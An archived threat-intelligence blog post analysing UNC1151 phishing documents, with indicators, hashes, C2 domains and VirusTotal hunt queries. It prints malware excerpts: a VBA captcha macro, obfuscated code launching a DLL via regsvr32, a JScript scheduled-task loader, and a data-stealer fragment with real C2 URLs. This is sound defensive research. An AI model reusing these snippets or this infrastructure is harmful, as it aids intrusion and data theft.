{
	"id": "a5fb7306-b730-4b28-9549-ffc2cd9e6e7a",
	"created_at": "2026-05-06T02:03:09.579555Z",
	"updated_at": "2026-05-06T02:03:52.679669Z",
	"deleted_at": null,
	"sha1_hash": "f701bdae3ae5d3caf47f349d5529b3e6ee098f09",
	"title": "StrikeReady — AI-Powered Security Command Center",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1389646,
	"plain_text": "StrikeReady — AI-Powered Security Command Center\r\nArchived: 2026-05-06 02:01:10 UTC\r\nUNC1151 has operated with a higher operational tempo in 2025, and in this blog, Labs shows how to track this\r\nactor, by surfacing two clusters of activity, and tying it to previously attributed samples.\r\nFiles that leverage anti-analysis techniques can often be interesting threads to pull on. In this case, we noticed a\r\ntrue positive document detection that wasn’t executing properly in our analysis environment, and it quickly\r\nbecame clear why. For a background on UNC1151, you should read high quality articles on this actor from CERT-PL, SentinelOne, Harfang Lab, GTIG/Mandiant, and Proofpoint.\r\nThe document ( Лист мадопомога.doc ec0e4a3dcfcc85ed52783f7cf2e80ddf) was leveraging a dynamic\r\ncaptcha, created in a local macro, to prevent analysis.\r\nFigure 1: What the user sees upon opening the doc\r\nThe reason we known it was to prevent detection, is that the first goal of a phish is to get code exec via opening\r\nthe document. The attacker had already achieved macro execution to run, so any roadblocks that would be thrown\r\nup, would only be to aggravate detection.\r\nThe macro in the document was constructed in the below, self-documented, code block. Noteworthy is that when\r\nthe captcha is correct, the string uOMeDrJtHN is being passed to unprotect the document, and the function\r\nllolo10ooll executed, which we will pivot on later. This has the hallmarks of being generated by an LLM. The\r\nrest of the obfuscation leverages 1 , L , 0 and o , which seems to be a nod to lol .\r\nhttps://strikeready.com/blog/captch-ya-if-you-can/\r\nPage 1 of 8\n\n1Private Sub CommandButton1_Click() 2 ' Validate the user input CAPTCHA 3 userInput =\r\nMe.TextBox1.Value 4 correctCaptcha = Me.Label2.Caption 5 6 If userInput = correctCaptcha Then 7 MsgBox\r\n\"CAPTCHA verified successfully!\", vbInformation 8 ActiveDocument.Unprotect (\"uOMeDrJtHN\") 9 For i =\r\nActiveDocument.Shapes.Count To 1 Step -1 10 ActiveDocument.Shapes(i).Delete 11 Next i 12 llolo10ooll\r\n13 Else 14 MsgBox \"Incorrect CAPTCHA. Please try again.\", vbExclamation 15 ' Optionally, regenerate a\r\nnew CAPTCHA 16 Label2.Caption = GenerateRandomCaptcha() 17 End If 18End Sub 19 20Private Function\r\nGenerateRandomCaptcha() As String 21 ' Characters to choose from for captcha 22 characters =\r\n\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\" 23 Randomize ' Initialize random\r\nnumber generator 24 ' Generate a 6-character random CAPTCHA 25 For i = 1 To 6 26 captcha = captcha \u0026\r\nMid(characters, Int((Len(characters) * Rnd) + 1), 1) 27 Next i 28 GenerateRandomCaptcha = captcha\r\n29End Function\r\nFigure 2: VB code to dynamically create a CAPTCHA\r\nThe document is then unprotected, the below decoy is shown, and the macro carves a dll and executes.\r\nFigure 3: decoy shown post macro execution\r\nThe full script is available in the appendix, but the MZ header encoding starts 37 37 20 39 30 → 77 90 →\r\nMZ .\r\nhttps://strikeready.com/blog/captch-ya-if-you-can/\r\nPage 2 of 8\n\nFigure 4: MZ header encoding\r\nThe carved file, EdgeService.dll 59b4add2262c4f44a3dc955893fe583d , beacons to agelessinvesting.xyz .\r\nPivoting on the aforementioned doc password, We can see the following matches\r\nFile Uploader Hash (MD5) C2\r\nРЕЗЮМЕ_Костенко.doc Ukraine 1990c4504010cd123c5d99ffee5551aa emfempowerment.top\r\nunknown Ukraine 7505ce7cba927140b91fd51986c4e717 hometownplate.top\r\nFigure 5: other recent payloads from this actor\r\nhttps://strikeready.com/blog/captch-ya-if-you-can/\r\nPage 3 of 8\n\nFigure 6: similar decoy from a different doc\r\nLeft to an exercise for the reader, one can also find many similarities to previously attributed samples, such as the\r\nmacro that launches the dll, such as 433A5C57696E646F77735C53797374656D33325C72656773767233322E657865\r\n(regsvr32) or 2F75202F7320 , the arguments. An example match from Harfang Lab’s post would be Список на\r\nперевірку 2025-2026.xls e21f310442347eeed2210a75c1fa8e01\r\n1o01lolololl1.TargetPath =\r\no0101l0ll1o(\"433A5C57696E646F77735C53797374656D33325C72656773767233322E657865\")\r\n2o01lolololl1.Arguments = o0101l0ll1o(\"2F75202F7320\") \u0026 Chr(34) \u0026 oo10l0lol \u0026\r\no0101l0ll1o(\"5C45646765536572766963652E646C6C\") \u0026 Chr(34) 3o01lolololl1.Description = \"\"\r\n4o01lolololl1.WindowStyle = o0101l0ll1o(\"30\") 5o01lolololl1.WorkingDirectory = loll11ol0o\r\n6o01lolololl1.Save 7Set o01lolololl1 = Nothing\r\nFigure 7: sig-able execution block, even obfuscated\r\nhttps://strikeready.com/blog/captch-ya-if-you-can/\r\nPage 4 of 8\n\nNoticing that aspects of the above were being detected by ESET as FrostyNeighbor , we went hunting on their\r\nother detections to try to find other samples. This led us to a set of HTAs 929. w sprawie zaniechania poboru\r\npodatku dochodowego od osób fizycznych.hta 9f5f8910fe8a554640124805ccfceadc . After execution, we can\r\nsee the decoy content:\r\nFigure 8: decoy from .hta malware above\r\nExamining the decoded first stage payload, an embedded HTA, we can see similar building of execution using\r\nChr(34) .\r\n1a0_0x1ddaff.Description = \"Create automated workflows between QQ applications and services to\r\nsynchronize files, get notifications, collect data, and more\"; 2var taskName = \"QQ Automated\r\nWorkflows\"; 3var programPath = a0_0x42397a; 4var a0_0x16e3db = \"//B //E:jscript \" +\r\nString.fromCharCode(34) + programPath + \":Zone.Identifier\" + String.fromCharCode(34) + \" /QQEX\";\r\n5a0_0x2838df.Arguments = a0_0x16e3db; 6a0_0x225f2e.Settings.MultipleInstances = 1;\r\nFigure 9: similar execution obfuscation\r\nAfter rounds of decoding, available in the appendix, we can see a data stealer\r\n1var a0_0x76f3fa = \"https://recommendations.99boulders.icu/how-to-tie-climbing-knots-stretches-bouldering.html\"; 2var a0_0x5efd49 =\r\n\"https://recommendations.99boulders.icu/builds/core/8f656da/gdpr/vendor/prebid/es2018/prebid.min.js\";\r\n3var a0_0x1fb64f = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/132.0.0.0 Safari/537.36\"; 4a0_0x14aa73.push(\"User: \" + userName);\r\nhttps://strikeready.com/blog/captch-ya-if-you-can/\r\nPage 5 of 8\n\n5a0_0x14aa73.push(\"\\nComputer: \" + computerName); 6a0_0x14aa73.push(\"\\nSystem: \" + osVersion);\r\n7a0_0x14aa73.push(\"\\nBooted: \" + a0_0x18bb96); 8a0_0x14aa73.push(\"\\nTime: \" + new Date());\r\nFigure 10: readable data stealer ftw\r\nLooking for commonalities in the code, we can find a substantially similar payload used in a ClickFix attack,\r\ndescribed by researcher Ireneusz Tarnowski targeting Poland. For further analysis of that payload chain, please see\r\nthe link.\r\nCircling back to our original HTA payload, we can see that it was loaded by a malicious PDF file W202504281099-\r\n01.pdf\r\nFigure 11: PDF doc targeting Poland\r\nBy looking for PDF files that have similar execution paths, we can find Potwierdzenie_215082025.pdf\r\nd10669832288eeb84b7cb2043f9d53d6 dropping a similar looking 926. zmieniające rozporządzenie w sprawie\r\nszczegółowych warunków i szczegółowego trybu przyznawania i wypłaty pomocy finansowej w ramach\r\nschematów na rzecz dobrostanu zwierząt w ramach.hta 9f70fdf21212846b23a4a2fa188fc6db beaconing to, as\r\nwell as 2de562e10411ccd868feb556f8c8f53b GMP_GMP093571.pdf to fermen.pickleandferment.top\r\nhttps://strikeready.com/blog/captch-ya-if-you-can/\r\nPage 6 of 8\n\nFigure 12: PDF doc targeting Ukraine\r\nTop level file Hash (MD5) C2 / Domain\r\nW202504281099-01.pdf 8ad246c273defa19cdea4f6fb178aa5f recommendations.99boulders.icu\r\nGMP_GMP093571.pdf 2de562e10411ccd868feb556f8c8f53b fermen.pickleandferment.top\r\nPotwierdzenie_215082025.pdf d10669832288eeb84b7cb2043f9d53d6\r\nkonsolahetman-epuap.abstractedreality.online\r\nZalacznik.rar af5bd3584dba96a1bf765ed9aefe7f1d —\r\nZalacznik.tar.gz 6d5513b888fbf86077f73560448d2d14 —\r\nFigure 13: recent PDF files from this attacker\r\nVT Queries Notes\r\nengines:frostyneighbor Detects this cluster, primarily from ESET\r\nhttps://strikeready.com/blog/captch-ya-if-you-can/\r\nPage 7 of 8\n\nVT Queries Notes\r\ncontent:\"/P -2112 /Perms\" Detects a specific permission structure\r\ncontent:\"uOMeDrJtHN\" Detects the key used to unlock docs\r\nFigure 14: VT hunt queries\r\nAll files mentioned are available for download on our github.\r\nPlease get in touch at research@strikeready.com if you have question, corrections, or comments, or if you\r\nappreciate Richard Wolf’s attribution.\r\nSource: https://strikeready.com/blog/captch-ya-if-you-can/\r\nhttps://strikeready.com/blog/captch-ya-if-you-can/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://strikeready.com/blog/captch-ya-if-you-can/"
	],
	"report_names": [
		"captch-ya-if-you-can"
	],
	"threat_actors": [],
	"ts_created_at": 1778032989,
	"ts_updated_at": 1778033032,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f701bdae3ae5d3caf47f349d5529b3e6ee098f09.pdf",
		"text": "https://archive.orkl.eu/f701bdae3ae5d3caf47f349d5529b3e6ee098f09.txt",
		"img": "https://archive.orkl.eu/f701bdae3ae5d3caf47f349d5529b3e6ee098f09.jpg"
	}
}